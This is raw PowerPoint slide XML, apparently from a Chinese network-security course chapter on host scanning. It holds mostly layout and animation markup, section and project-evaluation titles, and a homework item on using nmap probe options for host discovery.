                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="10892790" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>工具中的参数发送ARP、TCP、UDP、ICMP、SCTP、IP等协议进行主机发现扫描获得主机的存活情况。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="4000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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TextBox 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1354455" y="2427605"/>
            <a:ext cx="9048750" cy="7385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spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
                <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>本章内容结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" spc="-300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="LilyUPC" panose="020B0604020202020204" pitchFamily="34" charset="-34"/>
              <a:sym typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500870" y="5334000"/>
            <a:ext cx="2261870" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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8" presetClass="entr" presetSubtype="0" accel="50000" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="50000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="6" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="-45.0"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.rotation</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="-45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="69900">
                                          <p:val>
                                            <p:fltVal val="45"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="114" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="39" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="114"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="216"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-(0.354*#ppt_w-0.172*#ppt_h)"/>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 grpId="0"/>
    </p:bld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图片 7" descr="V-136038-F72FEC97O"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1">
            <a:alphaModFix amt="10000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="159385" y="-137795"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="D:\用户目录\Desktop\223.png223"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="216535" y="1415415"/>
            <a:ext cx="6368415" cy="4027805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 259"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5576570" y="1704340"/>
            <a:ext cx="4876800" cy="1009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86694" tIns="43347" rIns="86694" bIns="43347">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
